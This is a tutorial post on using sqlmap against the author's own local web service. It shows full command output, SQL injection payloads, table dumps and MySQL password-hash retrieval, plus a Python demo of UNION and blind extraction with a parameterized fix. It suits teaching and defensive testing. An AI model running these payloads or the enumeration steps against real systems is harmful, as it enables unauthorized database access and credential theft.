sqlmap: First Experience
2021/5/14 19:58:58
sqlmap
sqlmap is an open-source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers. It has a powerful detection engine, many niche features for the experienced penetration tester, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system over out-of-band connections.
Installation
pip install sqlmap
View the help (-h is the short list, -hh the full one)
sqlmap -hh
Chinese documentation
https://sqlmap.campfire.ga/
Direct database connection
With -d, sqlmap talks to the DBMS directly using credentials you already have (no web application in between). This is handy for seeing what the enumeration switches return before pointing them at an injection point.
Server database (MySQL)
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users
(-f fingerprints the DBMS version, --banner fetches its banner, --dbs lists databases, --users lists DBMS user accounts.)
File database (SQLite)
DBMS://DATABASE_FILEPATH
sqlmap -d "sqlite3://D:\guangbaouni-testtools\apiTestDjango\db.sqlite3" -f --banner --dbs --tables
Scanning a given URL
The target here is a service running locally; the purpose is to learn how sqlmap is used. Do not do anything illegal with it.
Source code of the scanned project: https://gitee.com/zy7y/uniapp_shop_server
1. Find the injection point
Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1
[sqlmap banner, version {1.5.5#pip}, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:34:37 /2021-05-14/
[13:34:37] [INFO] resuming back-end DBMS 'mysql'
[13:34:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:34:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:34:37 /2021-05-14/
The line "Title: Generic UNION query (NULL) - 5 columns" is the injection point: the query behind newid returns five columns, so a UNION with five values can be appended and its first column is reflected in the response.
Two things worth noticing in this output. First, sqlmap did not test anything here: it "resumed ... from stored session", i.e. it reused results from an earlier run against this host, which is also why the payloads carry newid=13 although the command says newid=1. Pass --flush-session to discard the session file and detect from scratch. Second, the three techniques are listed in increasing cost: boolean-based blind needs one request per yes/no answer, time-based blind additionally waits for SLEEP(5) on every true answer, and the UNION query returns whole values in one response, which is why sqlmap prefers it for the enumeration steps below.
2. List all databases through the injection point: --dbs
Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
[banner and legal disclaimer as in step 1]
[*] starting @ 13:40:12 /2021-05-14/
[13:40:12] [INFO] resuming back-end DBMS 'mysql'
[13:40:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points on newid as in step 1]
[13:40:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:40:12] [INFO] fetching database names
available databases [6]:
[*] atplant
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] uniapp_shop
[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:40:12 /2021-05-14/
Note that atplant, a database that has nothing to do with the shop, shows up alongside uniapp_shop and the system schemas. The MySQL account the web application connects with can see every database on the server, so a single injection in one application exposes everything that account can read. Running each application under its own least-privilege MySQL user, granted only on its own schema, keeps the blast radius to that one schema.
3. List all tables in a chosen database: -D
Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant --tables
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant --tables
[banner and legal disclaimer as in step 1]
[*] starting @ 13:45:07 /2021-05-14/
[13:45:07] [INFO] resuming back-end DBMS 'mysql'
[13:45:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points on newid as in step 1]
[13:45:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:45:07] [INFO] fetching tables for database: 'atplant'
Database: atplant
[8 tables]
+-----------------+
| alembic_version |
| atp_cases       |
| atp_envs        |
| atp_interfaces  |
| atp_projects    |
| atp_reports     |
| atp_tasks       |
| atp_users       |
+-----------------+
[13:45:07] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:45:07 /2021-05-14/
4. Enumerate the columns of a table: -T --columns (needs MySQL >= 5.0, which introduced information_schema; sqlmap reads column metadata from there)
Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users --columns
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users --columns
[banner and legal disclaimer as in step 1]
[*] starting @ 13:54:41 /2021-05-14/
[13:54:41] [INFO] resuming back-end DBMS 'mysql'
[13:54:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points on newid as in step 1]
[13:54:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:54:41] [INFO] fetching columns for table 'atp_users' in database 'atplant'
Database: atplant
Table: atp_users
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int          |
| name     | varchar(30)  |
| password | varchar(255) |
| username | varchar(128) |
+----------+--------------+
[13:54:41] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:54:41 /2021-05-14/
5. Dump the data in chosen columns: -C --dump
Note: the moment you run --dump against a system you are not authorized to test, you have already broken the law. Do not attack other people's services.
Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users -C username,password --dump
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users -C username,password --dump
[banner and legal disclaimer as in step 1]
[*] starting @ 14:39:33 /2021-05-14/
[14:39:33] [INFO] resuming back-end DBMS 'mysql'
[14:39:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points on newid as in step 1]
[14:39:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:39:33] [INFO] fetching entries of column(s) 'password,username' for table 'atp_users' in database 'atplant'
[14:39:33] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[14:39:33] [INFO] fetching number of column(s) 'password,username' entries for table 'atp_users' in database 'atplant'
[14:39:33] [INFO] resumed: 0
[14:39:33] [WARNING] table 'atp_users' in database 'atplant' appears to be empty
Database: atplant
Table: atp_users
[0 entries]
+----------+----------+
| username | password |
+----------+----------+
+----------+----------+
[14:39:33] [INFO] table 'atplant.atp_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\atplant\atp_users.csv'
[14:39:33] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 14:39:33 /2021-05-14/
"resumed: 0" means the row count was read back from the session file rather than queried again, so the "appears to be empty" result reflects the state of the table at the time of the earlier run. If rows have been added since, re-run with --flush-session (or --fresh-queries) to query the target again.
6. Fetch the DBMS users and their password hashes: --passwords
Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
[banner and legal disclaimer as in step 1]
[*] starting @ 14:40:02 /2021-05-14/
[14:40:02] [INFO] resuming back-end DBMS 'mysql'
[14:40:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[the same three injection points on newid as in step 1]
[14:40:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:40:02] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[14:40:05] [WARNING] no clear password(s) found
database management system users password hashes:
[*] develop [1]:
    password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD
[*] mysql.infoschema [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.session [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.sys [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] root [2]:
    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC
    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3
[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 14:40:05 /2021-05-14/
Reading the hashes: the $A$005$ prefix is MySQL 8's caching_sha2_password format, where 005 is the iteration count in thousands (5000 rounds of the SHA-256 based scheme), followed by a 20-byte salt and the digest. The \\u00xx sequences are sqlmap escaping non-printable salt bytes. The mysql.infoschema, mysql.session and mysql.sys accounts carry MySQL's deliberately invalid placeholder hash and cannot log in; root has two rows in mysql.user (one per host pattern), hence [2]. The dictionary attack found nothing, but the more important finding is that mysql.user is readable at all through the injection: the application's database account holds privileges far beyond its own schema.
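The following Python script is an added example; it is not code from the original post or from the uniapp_shop_server project. It rebuilds what steps 1 to 6 above rely on, against an in-memory SQLite database: a handler that concatenates newid into a five-column query, the boolean-based blind check from step 1 (the page's payload 13 AND 6236=6236), the UNION technique with sqlmap-style markers (the page's 0x716a6a7a71 and 0x71786b7a71 decode to the strings qjjzq and qxkzq; SQLite's || stands in for MySQL's CONCAT), the character-by-character blind extraction that --dbs, --tables and --dump fall back to when no UNION channel is usable, and the parameterized fix. The news and atp_users tables, their rows, the marker strings and the get_news_* function names are constructed for the demo.

```python
"""Added example (not from the original post or the uniapp_shop_server project).

Rebuilds the page's newid injection on an in-memory SQLite table: boolean-based
blind detection, UNION extraction with sqlmap-style markers, character-by-
character blind extraction, and the parameterized fix. Tables, rows and
function names are constructed for this demo; only the payload shapes come
from the sqlmap output above.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, ts TEXT)")
conn.execute("INSERT INTO news VALUES (13, 'Launch', 'Shop is live', 'admin', '2021-05-14')")
conn.execute("CREATE TABLE atp_users (id INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO atp_users VALUES (1, 'develop', 'pbkdf2$demo')")  # constructed row

REQUESTS = 0  # counts "HTTP requests": each call to the vulnerable handler is one


def get_news_vulnerable(newid: str):
    """Stand-in for a handler that concatenates the GET parameter into a 5-column query."""
    global REQUESTS
    REQUESTS += 1
    sql = f"SELECT id, title, body, author, ts FROM news WHERE id = {newid}"
    return conn.execute(sql).fetchall()


def get_news_fixed(newid: str):
    """Hardened version: reject non-integer ids, then bind the value instead of splicing it."""
    if not newid.isdigit():
        return []
    sql = "SELECT id, title, body, author, ts FROM news WHERE id = ?"
    return conn.execute(sql, (int(newid),)).fetchall()


def boolean_blind_differs(newid: str = "13") -> bool:
    """sqlmap's boolean-based test: a true and a false condition on the same id must
    produce different responses (the page's payload was `newid=13 AND 6236=6236`)."""
    true_resp = get_news_vulnerable(f"{newid} AND 6236=6236")
    false_resp = get_news_vulnerable(f"{newid} AND 6236=6237")
    return true_resp != false_resp


# The page's 0x716a6a7a71 / 0x71786b7a71 are these marker strings in hex.
PREFIX, SUFFIX = "qjjzq", "qxkzq"


def union_extract(expr: str) -> str:
    """Generic UNION query (NULL) - 5 columns: the wanted value is wrapped in random
    markers so it can be cut out of the response body however the app renders rows.
    SQLite's || stands in for MySQL's CONCAT()."""
    payload = f"13 UNION ALL SELECT '{PREFIX}' || ({expr}) || '{SUFFIX}', NULL, NULL, NULL, NULL-- -"
    body = str(get_news_vulnerable(payload))  # pretend this is the HTTP response body
    start = body.index(PREFIX) + len(PREFIX)
    return body[start:body.index(SUFFIX, start)]


def blind_extract(expr: str, max_len: int = 64) -> str:
    """Boolean-based blind retrieval: binary search on each character's code point,
    about 7 requests per ASCII character. This is what --dbs/--tables/--dump cost
    when only a blind channel is available (time-based blind adds the SLEEP delay)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"13 AND unicode(substr(({expr}), {pos}, 1)) > {mid}"
            if get_news_vulnerable(cond):  # a row came back == condition was true
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: substr() is '' and unicode('') is NULL, never > mid
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("boolean-blind differs:", boolean_blind_differs())
    print("UNION:", union_extract("SELECT password FROM atp_users WHERE username='develop'"))
    before = REQUESTS
    print("blind:", blind_extract("SELECT username FROM atp_users WHERE id=1"),
          "in", REQUESTS - before, "requests")
    print("fixed handler with payload:", get_news_fixed("13 AND 6236=6236"))
```

Running it shows the cost difference sqlmap's technique ordering reflects: the UNION path returns the whole password in one request, while blind extraction spends roughly seven requests per character (and, with time-based blind, five seconds per true answer on top). The fixed handler returns nothing for every payload because the value never reaches the SQL parser.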
Finally
Do not use this tool maliciously against other people's services or break the law. For advanced usage see the official documentation.
References
sqlmap Chinese documentation
Practical SQL injection walkthrough